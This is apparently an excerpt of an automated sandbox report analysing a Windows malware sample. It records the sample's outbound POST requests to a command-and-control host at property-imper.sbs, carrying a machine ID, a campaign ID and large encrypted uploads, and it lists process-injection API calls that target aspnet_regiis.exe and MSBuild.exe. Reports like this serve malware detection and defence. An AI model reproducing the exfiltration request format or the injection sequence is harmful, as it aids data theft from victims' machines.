2024-11-23 14:10:13 UTC	1022	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eu9u6vj62pguqlfb3v08k3ig84; expires=Wed, 19-Mar-2025 07:56:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UDUj11e6IvHZ1vxsUPxHBikSRfZ%2Fzq3fRROK99o0%2B7Ew%2Fe6t4MRttwINvKIhWHF%2FUEVqqMtEtqsv1jcIuGSpA%2BtIJwn%2FjWrigZKc4MlBB9yZtXIhNyY%2FkhDCTV8KcdMbRmWajks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bdcd6f624204-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2227&delivery_rate=1772920&cwnd=247&unsent_bytes=0&cid=c8fcc5ca42470d6f&ts=757&x=0"
2024-11-23 14:10:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:10:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:14 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QV5928JTG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569006 Host: property-imper.sbs
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --QV5928JTGContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--QV5928JTGContent-Disposition: form-data; name="pid"1--QV5928JTGContent-Disposition: form-data; name="lid"yau6Na--6642475507--QV5928JTGContent
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: f3 b2 cb f7 57 5f b1 fb 4c 47 7c 05 06 a4 98 13 00 df 06 cf 62 1e 7e 63 e7 51 be d9 88 c3 df 60 71 c6 e5 ff 33 02 c8 43 2a f0 c8 6f 43 70 3f 88 33 a4 e6 fa 01 66 2e 1f 38 0d 07 44 86 e0 b8 47 65 6b 1d fc 66 f6 63 36 14 43 56 8a 79 51 be f4 d9 b5 94 df 79 53 2d 23 10 b4 97 6f cf 59 eb 03 ad 6d 97 bc 9f c7 79 3d af 16 f1 f4 c0 11 da c4 9b a3 35 1a b8 1c f7 9a 64 b5 fc cb 3f f0 03 61 92 e8 d6 fb 14 e6 22 7b e6 cb 5f db da b1 94 f2 38 05 f3 bc 6f b8 33 9a e9 8d 3e ca a0 f3 09 3d f0 bd 72 ad 92 48 18 db cc 79 77 69 d0 aa 69 27 bf 07 4d 39 19 62 92 b2 7c b5 7d f1 6f 31 1c 91 a0 7a 13 b1 30 21 71 5b 33 7a d4 54 2e ab 3f 0c 91 37 b9 7c 1d 6c 73 be 5b da 7f 95 af ee e3 cf 01 49 4b 23 cc 89 d3 ce bb 9e a4 a2 fe 43 b1 75 15 4a d7 5a a8 19 54 8a 1b fa 8d 50 3e 26 c9 Data Ascii: W_LG\|b~cQ`q3C*oCp?3f.8DGekfc6CVyQyS-#oYmy=5d?a"{_8o3>=rHywii'M9b\|}o1z0!q[3zT.?7\|ls[IK#CuJZTP>&
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: a6 f1 47 6d 6c e0 e5 c2 ee e0 24 7c b0 97 68 b9 c3 57 7a fd 57 ff eb 6f 6d aa dc 23 6a 6a 0a 25 c1 50 71 88 29 c4 98 cd c5 83 6d 3b fe d5 62 a9 75 11 88 41 fa ef c8 f5 f9 97 20 69 e6 bf 43 ac 73 b3 35 bc 01 8d 84 04 10 a7 c8 ff d7 a0 69 a9 fe 3e 51 13 88 80 c3 18 de c9 3d bb fb 80 f4 7e 9a 2a 02 c7 d7 af ef 93 6d 94 49 86 aa 57 77 d6 f5 cb 55 4a 81 c5 c6 1b 90 af e8 b3 f4 e3 6a a2 ed 1f d1 57 b2 ef f3 f6 fc 05 14 c1 b8 7a c2 cf e3 7f da 0a 22 eb 90 03 2d de fa 83 20 05 97 19 e3 d3 a3 10 2d 1c 1d 00 1f 5b 50 29 e2 c8 af eb 6a 78 e2 ae 1a 30 09 bb 09 0f 38 41 44 f0 61 2a e2 35 a9 40 cb 23 77 6f 83 ce 96 fc 29 52 f1 7c ed 1a be d4 24 bd 27 15 31 52 42 e6 32 61 25 60 ef 00 8b 98 b8 8f e4 cd 29 60 46 20 81 ec d5 e3 c9 fc fa 8d 74 09 68 42 bb 96 dc a0 5e 47 89 Data Ascii: Gml$\|hWzWom#jj%Pq)m;buA iCs5i>Q=~mIWwUJjWz"- -[P)jx08ADa5@#wo)R\|$'1RB2a%`)`F thB^G
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: fd b9 b2 fd 63 65 c5 cb 9a 4c 24 0e 11 6e a1 6f 1f 27 df c8 4d 03 74 35 22 95 86 26 f3 a3 78 95 80 07 16 bb 7e 4c c3 52 05 ef 94 63 82 05 4f a1 70 c4 01 ae e1 c1 41 9c 47 89 ca 8b 59 f6 43 93 8f 3c b0 f3 e4 db 37 af ff d0 75 b3 9c 1f 42 8f 74 5e 9c 03 c4 2b 10 51 61 28 1f 05 5c db 0a 9e 3c 81 4b 41 bd fe 7f a7 d6 da 5c b0 56 6f df af 37 68 db 85 eb d7 63 91 77 66 ab 7d 79 cd 8a 4f b9 55 7b 61 bc 78 57 e4 17 8a b3 44 fd 2c bd 1a 02 12 71 90 db e4 de 75 2b 9e 00 79 e0 fc 7d 8e 14 51 83 1b 8a 2b 45 ed ca db a5 87 fd 2e 21 f0 1a 4d ef 14 20 eb b2 d4 57 84 2c 6a 49 a9 a2 38 11 f0 46 54 dd 12 64 36 84 b8 02 c2 50 c1 dc b0 9c d8 48 b5 d6 33 86 be 90 fa 3f 11 2f 0e 91 5a 00 66 11 cd 8e d3 43 ed 04 07 17 7f ba a7 a3 d7 0f ec df bd 11 f7 3b a1 86 cc cf b9 44 28 68 Data Ascii: ceL$no'Mt5"&x~LRcOpAGYC<7uBt^+Qa(\<KA\Vo7hcwf}yOU{axWD,qu+y}Q+E.!M W,jI8FTd6PH3?/ZfC;D(h
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: c9 88 69 64 95 3c 70 99 2f bf f4 40 82 53 08 ea 1f c1 44 7c f3 88 10 ca b8 82 03 38 04 9e bd 12 98 d5 e7 56 04 02 a1 8d d0 42 86 3f 0c ea 87 46 46 06 c2 61 7e eb 1a bd fc 0c 8b a6 c6 40 ba 39 ed f7 09 b2 e9 d1 e3 e1 19 11 da 15 5c 15 6f 84 c2 ea 5b 25 6b b2 55 c0 99 49 79 88 e8 c6 b7 3c 80 c4 23 02 a5 6f f9 9a f8 6b 18 b6 45 6a ae 55 fa dc 24 4d 34 1f 90 14 9e 70 32 d6 e7 4e 61 ce 4c 5e dc bf 9e 3b a4 8e 19 0e 7c 34 38 1c 7c 6c 41 b9 bb 88 d1 aa 2d 66 a7 2d d5 bc 10 cc b8 76 9c 2c b6 fe 5a d3 76 58 be 75 51 d2 be 3e 4c 43 b4 ad 9c 13 c6 4d 11 14 18 09 c2 80 60 0c 8c b1 0d fa 77 09 d0 47 16 8c c4 80 6d 34 ad ea 5c b1 53 0c 26 1c 91 6e 11 a2 ef 65 d7 4c fd 24 34 2e 55 f0 3a e7 6d 3c da fe bc 00 73 55 f8 a0 5d a8 aa df 96 51 ac 63 2e de ff 5b 45 f1 ff 7d 41 Data Ascii: id<p/@SD\|8VB?FFa~@9\o[%kUIy<#okEjU$M4p2NaL^;\|48\|lA-f-v,ZvXuQ>LCM`wGm4\S&neL$4.U:m<sU]Qc.[E}A
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: 26 a2 5a 49 17 4f 4f 66 69 e0 a1 b9 98 71 eb dc ba 08 9e 4b 58 0a 5b eb 02 dd 1c 42 c2 33 92 1f 5f 89 f7 45 52 0d 10 58 23 15 bf 6e 19 32 bf ba ac 5b 30 86 94 40 84 6a 3f 9f 00 31 dc d3 05 99 a4 f3 30 f2 f9 2e 1c ec f2 a8 1e 30 53 f1 91 e5 ed 26 07 49 e7 00 fb fd 6c 71 d6 12 48 6d a3 54 ac 05 ce 82 d3 60 ca 5d 51 0c 68 5e 31 a5 ee 80 8d 41 ad cc ca 81 07 ca 77 37 07 74 31 44 54 85 9a 8c 7b 5e 2f c2 64 53 c6 58 b7 ca ce 02 f9 3f 28 60 4e da b4 a6 8d 14 b4 ef 3a c2 83 36 07 25 54 42 b4 09 43 73 1c 30 8c 87 5b 90 c0 f2 11 dc 25 0a 76 97 2d 0b d3 db 8d 7b c5 41 d9 e6 ed bd 01 28 a0 c1 7e a2 89 a8 2c d4 2a 22 44 cf e9 94 64 40 7d 07 c7 8b 55 c1 69 86 fb 87 8d f5 c3 8e 83 1b 4d 1f 52 0e 8f b3 1f 55 a6 a8 28 53 b3 0c fe 28 f4 1d 1d 0a eb 11 6d 3d 90 5e 1f 46 a1 Data Ascii: &ZIOOfiqKX[B3_ERX#n2[0@j?10.0S&IlqHmT`]Qh^1Aw7t1DT{^/dSX?(`N:6%TBCs0[%v-{A(~,*"Dd@}UiMRU(S(m=^F
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: 90 e3 85 28 f8 b9 38 5a 0e aa d6 e8 6d 96 54 dc ce f4 a6 c5 16 59 f8 d1 84 0b 4c 69 c3 36 45 70 07 25 c1 a1 b9 87 80 74 73 6a da ee e9 5b 97 eb 8e 2b ca 94 37 ea 6a 80 6e 9e 20 fc ce 63 f4 34 9a fe 76 63 d4 32 b7 bf 77 8c ff bb 2d f4 45 9d 70 9d 33 44 66 64 05 f0 df 33 37 ec 47 92 16 f9 f9 3e c2 f4 79 eb f0 3d 05 43 dc bf 70 bc e3 ba 80 1d a3 8c f8 09 f1 a9 5e 41 b6 2d 60 7f 97 25 02 8d 8e dc 3d 24 7e c6 61 ae 34 ab 4b 0d 55 43 69 81 fa e4 c1 a1 8f b8 a4 83 5e 86 da 3d 8a 7d 8e 65 3b 42 cf c8 92 fa 26 70 e9 75 ba 9d 5f 39 43 e5 07 23 91 96 63 98 aa 07 a4 e7 ac 9f 56 57 1a 48 d3 b8 fc ed 1a c3 23 48 26 89 c2 0a f7 40 68 37 51 21 14 11 05 4e 0c 8a dd ba 6b 31 7e 54 e4 90 f8 d1 d5 67 f3 0d a1 0a 24 af 26 ed 12 13 0a 2f 34 74 f9 ee d9 cf be 8c 99 4d de 5a 82 Data Ascii: (8ZmTYLi6Ep%tsj[+7jn c4vc2w-Ep3Dfd37G>y=Cp^A-`%=$~a4KUCi^=}e;B&pu_9C#cVWH#H&@h7Q!Nk1~Tg$&/4tMZ
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: 51 e5 be f2 33 a4 0d b2 cf 60 38 46 46 b7 ff 44 18 bd d6 f5 91 d9 4e 06 51 00 94 97 8e 97 97 1b 78 c5 01 7c f0 82 76 7d b8 b4 a3 1f 67 2a e3 32 20 f4 fb 05 a7 bb 19 7f d6 6d af 6b 37 2a 5e cf 50 e1 ca 9c 23 e9 6f d9 5b 2e 6a 5d a5 71 83 3f 04 8b 6e b5 72 f9 ce b1 b5 63 e6 90 94 cc 4a 95 4d 7b 76 fa a4 ad f7 55 a0 4f 4b 3f 9a d1 1a 9a 4f 53 e7 26 04 ef 4a 9f b2 81 e3 e0 bf 29 fd df 7a 06 6f 1a 02 42 01 d4 83 97 34 b6 e1 08 07 3b 7f 5b 1b ff 40 cf 0e da 78 5d 10 b4 35 76 92 53 c5 3c b8 83 7c 2c bf 8b cd e9 35 16 88 51 ca 1c 7c 2f 07 b4 8e d0 ae 7f 4e cb 55 6c b9 1d a0 fd 38 fc f3 1d e3 5b 5a 60 ba 24 aa 01 51 e9 7d e2 48 10 26 ca 5a 00 dc 42 a1 79 97 4e 39 13 26 45 87 5d a5 64 76 d5 e5 7b 75 4b fd 4d f2 94 1a 13 34 29 c3 40 c2 f5 06 60 c7 b8 37 f5 3b 40 9e Data Ascii: Q3`8FFDNQx\|v}g2 mk7^P#o[.j]q?nrcJM{vUOK?OS&J)zoB4;[@x]5vS<\|,5Q\|/NUl8[Z`$Q}H&ZByN9&E]dv{uKM4)@`7;@
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: aa 2e 02 62 9f f5 05 3c 15 51 ea 52 81 d0 d8 f3 8e 55 2f 8b 3b 6c 08 d7 b7 10 f7 1c e4 8e f9 82 7a 75 46 df 42 cc 7a 18 4c 83 43 2f 2c 86 ab f4 c1 87 65 5b 26 a8 54 ec ac 3f 0d 15 86 83 24 51 e7 57 2b 75 8e 84 c9 6c 8d 06 96 0d 70 6b 74 47 12 09 1d 6d 88 4b bd 85 7e 7c 17 85 40 52 9b 49 e3 ed 75 63 a7 a6 c0 54 99 3d c5 28 b3 7b 16 c2 1b 12 ab 7b a5 df 15 10 bd 44 85 b5 ac fa c2 a2 c2 26 71 ef cc db 30 47 dc b4 ae 60 ce 43 b1 8b 57 5c 22 8c 79 55 fa dd 2c bd 4c 47 73 09 fe dc 7e 18 e1 31 9d 1c cf e8 ae df ac dd 3b c1 73 ec 8a a9 30 2a 94 ba 3e 33 44 df 0d 2b cd f2 ea 94 62 cb d2 a7 dd b4 33 00 8e 0a 33 5b f3 86 af eb 4d 64 07 c4 6f 5a e9 b6 67 33 a4 38 57 0d a8 d7 da 08 5d 3d 6c 8f a3 58 5d 85 cb aa 7a e0 92 76 61 da 60 b2 ea 38 53 7f 7c fd 4c 54 68 80 c8 Data Ascii: .b<QRU/;lzuFBzLC/,e[&T?$QW+ulpktGmK~\|@RIucT=({{D&q0G`CW\"yU,LGs~1;s0*>3D+b33[MdoZg38W]=lX]zva`8S\|LTh
2024-11-23 14:10:15 UTC	15331	OUT	Data Raw: df 18 2f 0f 8e c8 81 77 32 7a 48 f0 b4 4f 34 dd 3c e4 c7 76 cb fe 64 93 ab 5b 3f 9e 09 6b 80 93 eb 76 ea fc 9f 01 8e ab 95 b0 44 5c 21 2f d0 59 bb ed 75 eb ae f3 51 ea 0f 24 da af f6 d6 bb 24 39 f0 5b ee 94 2e ee 79 9d 38 84 e3 aa 04 54 49 df fc a8 92 f0 16 43 b4 ad 41 61 07 95 77 a3 8f ed 35 82 1d 21 d9 2a 70 b8 fe 7a 5a 98 9b 4a e3 6e 13 de d3 a3 ef 3a f1 79 51 43 31 f3 57 cd d2 3a c4 6f 11 85 3e 3b 50 bb 92 43 07 ee c8 6d d8 5f 5b fb 28 82 e7 be a0 8b d2 30 86 87 04 95 14 13 2c b3 05 5f 1f d5 fa 14 fd 66 93 7d a4 d8 03 ca 76 f2 52 97 f6 a2 52 5c b0 73 e3 c5 c2 77 9d 9b 23 79 59 18 8e 9b 99 f4 34 06 c2 cd b9 36 63 c7 d7 de d6 44 1f c1 ea b7 72 3b 9d 0c 14 d7 6a e3 48 55 7c f8 c4 60 0d bd 36 b1 39 1a 61 d8 e4 6f 16 c1 bb ba 22 1f 13 d9 23 9f 17 d6 c4 f2 Data Ascii: /w2zHO4<vd[?kvD\!/YuQ$$9[.y8TICAaw5!*pzZJn:yQC1W:o>;PCm_[(0,_f}vRR\sw#yY46cDr;jHU\|`69ao"#
2024-11-23 14:10:17 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=crrqen0bt074bo3in3cc34d74t; expires=Wed, 19-Mar-2025 07:56:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMyMCWRAb5VAtmsIrD8YH31nXUh4CogmHaHio1gWOyF5PjaKVtRoFntl9TjyazJ%2FaaFJlyEj11DYBaB6pcyKMUQvo%2FyvGldAtpMCCq7suv1ASu1wDvO3lYVBv2Jdm1tFn2Pv%2BS8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bddcddee8c4d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1865&sent=342&recv=592&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571546&delivery_rate=1358771&cwnd=158&unsent_bytes=0&cid=67239dc2c053329f&ts=2310&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:18 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: property-imper.sbs
2024-11-23 14:10:18 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 26 6a 3d 26 68 77 69 64 3d 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6642475507&j=&hwid=858A79457327DFB7C8852029FBE145BA
2024-11-23 14:10:19 UTC	1007	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0r502g7euboqf0v3osmg4i7775; expires=Wed, 19-Mar-2025 07:56:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9j4VWN2FbNCvxRi762hAcOdlcc22cxUKYwrmPPcK0XhQYKmHh9XWVoz1DwAaZzQwTisNjoBgx2pWpqZVXLWzf3ibyKBSnJXRjp2WuZ2PtQZpjkLf6VexEox5GN0hMO8G4HDIoo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bdf38911727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=989&delivery_rate=1526398&cwnd=249&unsent_bytes=0&cid=c4d7c1418f41f79b&ts=716&x=0"
2024-11-23 14:10:19 UTC	54	IN	Data Raw: 33 30 0d 0a 71 35 67 78 58 31 7a 77 62 71 4d 4e 30 32 37 6a 31 5a 44 78 51 4d 64 79 6e 49 50 66 41 4b 43 78 43 45 56 46 51 38 77 47 6a 56 37 77 78 51 3d 3d 0d 0a Data Ascii: 30q5gxX1zwbqMN027j1ZDxQMdynIPfAKCxCEVFQ8wGjV7wxQ==
2024-11-23 14:10:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:09:57
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\S#U043eftWare.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\S#U043eftWare.exe"
Imagebase:	0x4f0000
File size:	707'072 bytes
MD5 hash:	82C56F5E8DCAE969405B4F02BE0D785A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:09:57
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:09:58
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0xa50000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:09:58
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228
Imagebase:	0xbc0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.5%
Total number of Nodes:	688
Total number of Limit Nodes:	23

Executed Functions

Function 6CDC86F0 Relevance: 99.4, APIs: 31, Strings: 21, Instructions: 8368nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?), ref: 6CDCA7D7
ShowWindow.USER32 ref: 6CDCA7ED
VirtualAlloc.KERNELBASE ref: 6CDCAC55
CreateProcessW.KERNELBASE ref: 6CDCB41F
NtGetContextThread.NTDLL ref: 6CDCB622
NtAllocateVirtualMemory.NTDLL ref: 6CDCB7E2
NtAllocateVirtualMemory.NTDLL ref: 6CDCB9B2
NtWriteVirtualMemory.NTDLL ref: 6CDCBA20
NtWriteVirtualMemory.NTDLL ref: 6CDCBE60
NtReadVirtualMemory.NTDLL ref: 6CDCD80C
NtWriteVirtualMemory.NTDLL ref: 6CDCD930
NtWriteVirtualMemory.NTDLL ref: 6CDCDF3F
NtCreateThreadEx.NTDLL ref: 6CDCE881
NtSetContextThread.NTDLL ref: 6CDCEC8F
NtResumeThread.NTDLL ref: 6CDCECAD
CloseHandle.KERNEL32 ref: 6CDCEE14
CloseHandle.KERNEL32 ref: 6CDCF039
NtGetContextThread.NTDLL ref: 6CDCF717
NtWriteVirtualMemory.NTDLL ref: 6CDCF7B9
NtReadVirtualMemory.NTDLL ref: 6CDCFADF
NtWriteVirtualMemory.NTDLL ref: 6CDCFB98
CloseHandle.KERNEL32 ref: 6CDCFDF6
NtAllocateVirtualMemory.NTDLL ref: 6CDCFFBD
NtWriteVirtualMemory.NTDLL ref: 6CDD0080
NtWriteVirtualMemory.NTDLL ref: 6CDD01AB
NtCreateThreadEx.NTDLL ref: 6CDD0473
CloseHandle.KERNEL32 ref: 6CDD0500
NtGetContextThread.NTDLL ref: 6CDD0587
NtWriteVirtualMemory.NTDLL ref: 6CDD0621

Strings

?i~, xrefs: 6CDCA980
gN@,, xrefs: 6CDCB1E8
MZx, xrefs: 6CDCA81B, 6CDCA83D
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CDCB069, 6CDCF5F6, 6CDCFF23, 6CDD0557
J*W!, xrefs: 6CDCE686
z4XD, xrefs: 6CDCB1E3
}|K, xrefs: 6CDC874F
@al|, xrefs: 6CDCC411
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CDCAF12, 6CDCFF00
RFk|, xrefs: 6CDCCA22
z4XD, xrefs: 6CDCB19A
D, xrefs: 6CDCFEC4
BO, xrefs: 6CDCED21
pie$, xrefs: 6CDCD218
@al|, xrefs: 6CDCC37D
kernel32.dll, xrefs: 6CDCA7F3
@, xrefs: 6CDCFFB5
]4$, xrefs: 6CDCBBED
ntdll.dll, xrefs: 6CDCA807
]4$, xrefs: 6CDCBB77
Pi, xrefs: 6CDCC578

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: Virtual$Memory$Write$Thread$CloseContextHandle$AllocateCreate$ReadWindow$AllocConsoleProcessResumeShow
String ID: ?i~$@$@al|$@al|$BO$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$J*W!$MZx$RFk|$]4$$]4$$gN@,$kernel32.dll$ntdll.dll$pie$$z4XD$z4XD$Pi$}|K
API String ID: 2249330402-1764667461
Opcode ID: eb0e45915b0ff5f6fff4dfa6c794446b836855d9d5f2f661b1a7dc0a22952846
Instruction ID: 239ca19db06a986679822aadbfb17ae6c6636a52b5a25206fad66c3383cf0776
Opcode Fuzzy Hash: eb0e45915b0ff5f6fff4dfa6c794446b836855d9d5f2f661b1a7dc0a22952846
Instruction Fuzzy Hash: 27E32572B402158FCB18CF3CC9947C977F2AB8A364F114299D569DBBB4C73A9A498F01

Function 6CDC1400 Relevance: 61.2, APIs: 24, Strings: 9, Instructions: 3428filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CDC22AA
GetModuleHandleA.KERNEL32 ref: 6CDC22E8
K32GetModuleInformation.KERNEL32 ref: 6CDC2560
CreateFileMappingA.KERNEL32 ref: 6CDC2E02
CloseHandle.KERNEL32 ref: 6CDC3293
VirtualProtect.KERNELBASE ref: 6CDC3BB8
VirtualProtect.KERNELBASE ref: 6CDC3C78
CloseHandle.KERNEL32 ref: 6CDC3F89
GetCurrentProcess.KERNEL32 ref: 6CDC4058
GetModuleHandleA.KERNEL32 ref: 6CDC4096
GetModuleFileNameA.KERNEL32 ref: 6CDC40C5
CreateFileA.KERNEL32 ref: 6CDC4106
CreateFileMappingA.KERNEL32 ref: 6CDC4245
MapViewOfFile.KERNEL32 ref: 6CDC4362
CloseHandle.KERNEL32 ref: 6CDC467E
MapViewOfFile.KERNEL32 ref: 6CDC46C0
CloseHandle.KERNEL32 ref: 6CDC4785
CloseHandle.KERNEL32 ref: 6CDC4796

Strings

SS, xrefs: 6CDC3008
g[8', xrefs: 6CDC2792
SS, xrefs: 6CDC4657
"k$, xrefs: 6CDC28AB
'Ddg, xrefs: 6CDC3A62
Hc$, xrefs: 6CDC3D05
@, xrefs: 6CDC3BAC
Hc$, xrefs: 6CDC3D85
g[8', xrefs: 6CDC2812

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
